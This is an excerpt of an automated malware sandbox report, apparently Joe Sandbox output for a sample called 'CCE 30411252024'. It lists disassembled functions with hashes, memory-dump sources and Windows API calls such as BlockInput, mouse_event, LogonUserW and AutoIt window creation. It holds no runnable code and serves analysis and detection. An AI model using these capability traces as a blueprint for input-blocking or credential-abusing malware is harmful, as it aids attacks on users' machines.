                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: 1d71cf4f4658aa089a235d7ffc1a974e782d33357f16ec70a2342109d5fafc75
                                                                                        • Instruction ID: ab9df40b31b42bd3e118524321f4622f80613a6936c966af5676c2fe13db3211
                                                                                        • Opcode Fuzzy Hash: 1d71cf4f4658aa089a235d7ffc1a974e782d33357f16ec70a2342109d5fafc75
                                                                                        • Instruction Fuzzy Hash: 77A25A70E04259CFDB24CF59C8806ADBBB1FF58314F2591AAD899AB391D7309E81DF90
                                                                                        Function 00EF3B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throwstd::exception::exception
                                                                                        • String ID: @
                                                                                        • API String ID: 3728558374-2766056989
                                                                                        • Opcode ID: 55dbd07c289cf5baff1dcdfd5a321d859f9226f3a426dee2a76ddfe5fec2c485
                                                                                        • Instruction ID: 61b38aef467073977ca93a4a8a9df887531e81df69cd81dd89666b7a9a5f8128
                                                                                        • Opcode Fuzzy Hash: 55dbd07c289cf5baff1dcdfd5a321d859f9226f3a426dee2a76ddfe5fec2c485
                                                                                        • Instruction Fuzzy Hash: BC72BD71E042099FCB10EFA4C881AFEB7B5EF48314F14905AEE09BB291D735AE45DB91
                                                                                        Function 00F0D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 788813c5071236345759cae5e160bf25bf08846948f6b0c16033dd5bd2c6bcf9
                                                                                        • Instruction ID: cc9597a9f40f2d4a0c8b59b58a151b26dea509dd7ae658de404905e16c27151d
                                                                                        • Opcode Fuzzy Hash: 788813c5071236345759cae5e160bf25bf08846948f6b0c16033dd5bd2c6bcf9
                                                                                        • Instruction Fuzzy Hash: E9324422D28F054DD7639634C922335A29CEFB73D4F15D737E829B5AAAEB29C4C36101
                                                                                        Function 00EE96C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 674341424-0
                                                                                        • Opcode ID: 2c0912a75c8288a110090c1ffc7dcd1f5ff407d6f3437dbe3356db6e48d60953
                                                                                        • Instruction ID: 2bd45c6883917d13b32c978422559ebfe2251f000188d0ae8e3480bfc70b8f33
                                                                                        • Opcode Fuzzy Hash: 2c0912a75c8288a110090c1ffc7dcd1f5ff407d6f3437dbe3356db6e48d60953
                                                                                        • Instruction Fuzzy Hash: 4C22CD715083449FD724DF25C890BAFB7E4EF84314F10592DFA9AAB292DB71E944CB82
                                                                                        Function 00F1038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3d7166f99a8b0b35618d03b03cf6f8a5a9cb49f00d2c8f2f77814e5f06f1304d
                                                                                        • Instruction ID: e11a859d3d7cc6b1c5aa3c50f2c29650ddeccf52ee4518b238ddb07d409c7456
                                                                                        • Opcode Fuzzy Hash: 3d7166f99a8b0b35618d03b03cf6f8a5a9cb49f00d2c8f2f77814e5f06f1304d
                                                                                        • Instruction Fuzzy Hash: 0DB10F20D2AF464DD22396388831336BA5CBFBB6D5F91D71BFC2A74D22EB6181C35181
                                                                                        Function 00F2B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __time64.LIBCMT ref: 00F2B6DF
                                                                                          • Part of subcall function 00F0344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00F2BDC3,00000000,?,?,?,?,00F2BF70,00000000,?), ref: 00F03453
                                                                                          • Part of subcall function 00F0344A: __aulldiv.LIBCMT ref: 00F03473
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                                                        • String ID:
                                                                                        • API String ID: 2893107130-0
                                                                                        • Opcode ID: c31351249d5b6b992ddb85825d20e922afff5add4ee0eb6049e415de30dba1c4
                                                                                        • Instruction ID: bcf1764757715388f2e0b77d0767141e64982ddbcdb92db2149dfdfc954d7475
                                                                                        • Opcode Fuzzy Hash: c31351249d5b6b992ddb85825d20e922afff5add4ee0eb6049e415de30dba1c4
                                                                                        • Instruction Fuzzy Hash: 262175766346108BCB19CF28D881A52F7E5EB95320B248E6DE4E5CB2C0CB78B905EB54
                                                                                        Function 00F36AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • BlockInput.USER32(00000001), ref: 00F36ACA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlockInput
                                                                                        • String ID:
                                                                                        • API String ID: 3456056419-0
                                                                                        • Opcode ID: 406478490c7893f068f33449ba1d53ae3d31d108a214ac28f10626c236f63e9f
                                                                                        • Instruction ID: b8f6e3f3e836ecb137318df476b9e0c0137e7cc02da50b6ff4e2185f6ab2bb4f
                                                                                        • Opcode Fuzzy Hash: 406478490c7893f068f33449ba1d53ae3d31d108a214ac28f10626c236f63e9f
                                                                                        • Instruction Fuzzy Hash: A4E012366002046FC700EB99D804956B7ECAFA8761F04C416EA45D7291DAB4E8049B90
                                                                                        Function 00F274E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00F2750A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: mouse_event
                                                                                        • String ID:
                                                                                        • API String ID: 2434400541-0
                                                                                        • Opcode ID: c2934fa6245a870ec1799fbd167050471726e0213032a0f50e0af87c196ad7ce
                                                                                        • Instruction ID: 4d175091cd8eea639dfd62df50cdcd47da53c321792126ee5a2f98e1b8c1258b
                                                                                        • Opcode Fuzzy Hash: c2934fa6245a870ec1799fbd167050471726e0213032a0f50e0af87c196ad7ce
                                                                                        • Instruction Fuzzy Hash: 1ED09EA556C765B9EC197724BC1BFB75508F304791FD84549B613D90C0A8D47D01B031
                                                                                        Function 00F1B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00F1AD3E), ref: 00F1B124
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LogonUser
                                                                                        • String ID:
                                                                                        • API String ID: 1244722697-0
                                                                                        • Opcode ID: 65396f8d4b90c912a8cf6eae1afa1b371edcf6367f2bd2e3316898010c1aa057
                                                                                        • Instruction ID: 9baa264fa0cb2c5abbcf3f31f92c299d4e35518cbc91c8946eab8c6b34fa926c
                                                                                        • Opcode Fuzzy Hash: 65396f8d4b90c912a8cf6eae1afa1b371edcf6367f2bd2e3316898010c1aa057
                                                                                        • Instruction Fuzzy Hash: C6D09E321A464EBEDF025FA4DC06EAE3F6AEB04701F448511FA25D50A1C675D531AB50
                                                                                        Function 00F5B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: NameUser
                                                                                        • String ID:
                                                                                        • API String ID: 2645101109-0
                                                                                        • Opcode ID: 8ba60b30e86c58f580df559ceb9ea5545dad95d50167f03102e56b5f60f02e9e
                                                                                        • Instruction ID: 062529814e5e3d0dd51d65aa1884b09f664e297f44ab9a8571c2e3dea1575aee
                                                                                        • Opcode Fuzzy Hash: 8ba60b30e86c58f580df559ceb9ea5545dad95d50167f03102e56b5f60f02e9e
                                                                                        • Instruction Fuzzy Hash: 68C04CB280010DDFC751CBC0CD48AEEB7BCAB04301F104191D215F1110D7709B45AB72
                                                                                        Function 00F08189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00F0818F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: d218cbd13cd02f74af742f50c7cc79af097ae0a4bab7c80488dde62edc7dad9e
                                                                                        • Instruction ID: f25b9c3664a8f59d33b29380a4f4bbbfa10ad1141927db80cf24001afb560c43
                                                                                        • Opcode Fuzzy Hash: d218cbd13cd02f74af742f50c7cc79af097ae0a4bab7c80488dde62edc7dad9e
                                                                                        • Instruction Fuzzy Hash: BFA0223000020CFBCF002F83FC0A8883F2CFB002A0B000020F80C00230CBB3A820AAC2
                                                                                        Function 00EEE3B0 Relevance: .5, Instructions: 540COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 77e8452952b848b2521a87b50fc18052f20fbf87ca7292e9a6a88cd1acac8af6
                                                                                        • Instruction ID: 5e748098e2ded9f503892515a42ae1d916b53b0be7fe732bb485f12d279a737c
                                                                                        • Opcode Fuzzy Hash: 77e8452952b848b2521a87b50fc18052f20fbf87ca7292e9a6a88cd1acac8af6
                                                                                        • Instruction Fuzzy Hash: F622CE7090024ACFDB24DF59D480ABEB7F0FF18314F189069E95AAB391E335AD85CB91
                                                                                        Function 00EE93F0 Relevance: .5, Instructions: 531COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e58336d9c8421b01df5d18c33a8fbe4f7a2df5072242b3338dabae39c729d5af
                                                                                        • Instruction ID: 6c01f848250da4642f4ac2d3a2b49276d80b0e814babbbb4d3f09f171a71c85f
                                                                                        • Opcode Fuzzy Hash: e58336d9c8421b01df5d18c33a8fbe4f7a2df5072242b3338dabae39c729d5af
                                                                                        • Instruction Fuzzy Hash: E4128B70A002099FDF04DFA5D981AEEB7F5FF48300F105669E806F7291EB35AA14DB60
                                                                                        Function 00EEAF50 Relevance: .5, Instructions: 514COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throwstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 3728558374-0
                                                                                        • Opcode ID: e36da753e42688d4c784bf6f05d6bbccd0c64b78516f0a60b805d9b4c7e86efb
                                                                                        • Instruction ID: 2ad7bb665deef984dc627747f69f3c23fff6ea73abcda5c21bc7e24cd0bebd2f
                                                                                        • Opcode Fuzzy Hash: e36da753e42688d4c784bf6f05d6bbccd0c64b78516f0a60b805d9b4c7e86efb
                                                                                        • Instruction Fuzzy Hash: 7A02D270E00109EBCF04DF69D981AAEBBF5FF44300F148069E906EB295EB35DA15DB91
                                                                                        Function 00F002A4 Relevance: .3, Instructions: 345COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                        • Instruction ID: 2b67993bda13953f5df1fdc5f8047eebcfa9b522e99232a084e5c31c994b8db7
                                                                                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                        • Instruction Fuzzy Hash: 88C1B2362051970ADF2D863AC43463EFAA15EA2BB571A176DD8B3CB4D5EF20C534F620
                                                                                        Function 00F006D9 Relevance: .3, Instructions: 341COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                        • Instruction ID: 50629e641760e40020d5334b1671a6f77956cf57d870da5749834e591a2f4527
                                                                                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                        • Instruction Fuzzy Hash: D2C1D0332051970AEF2D463AC43463EBAA15EA2BB571A176DD4B3CB5D5EF20C534F620
                                                                                        Function 00EFFE6F Relevance: .3, Instructions: 331COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                        • Instruction ID: 5f97921449794568769d0955516838bf1024c7ed5335cd65a61b530dfa0b3fbf
                                                                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                        • Instruction Fuzzy Hash: 94C1C1322051970ADF2D463A843463EBBA15FA2BB971A137DD4B3DB4D5EF20C534E620
                                                                                        Function 00EFFA57 Relevance: .3, Instructions: 323COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                        • Instruction ID: 9ec35c96382244b66631fa824783048706b92ae7a62704724bd03a34002e41f9
                                                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                        • Instruction Fuzzy Hash: 86C1C23220509B09DF2D463AC47053EFAA15EA2BB931A277DD5B3EB5D5EF20C534D620
                                                                                        Function 00F3A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 00F3A2FE
                                                                                        • DeleteObject.GDI32(00000000), ref: 00F3A310
                                                                                        • DestroyWindow.USER32 ref: 00F3A31E
                                                                                        • GetDesktopWindow.USER32 ref: 00F3A338
                                                                                        • GetWindowRect.USER32(00000000), ref: 00F3A33F
                                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00F3A480
                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00F3A490
                                                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F3A4D8
                                                                                        • GetClientRect.USER32(00000000,?), ref: 00F3A4E4
                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F3A51E
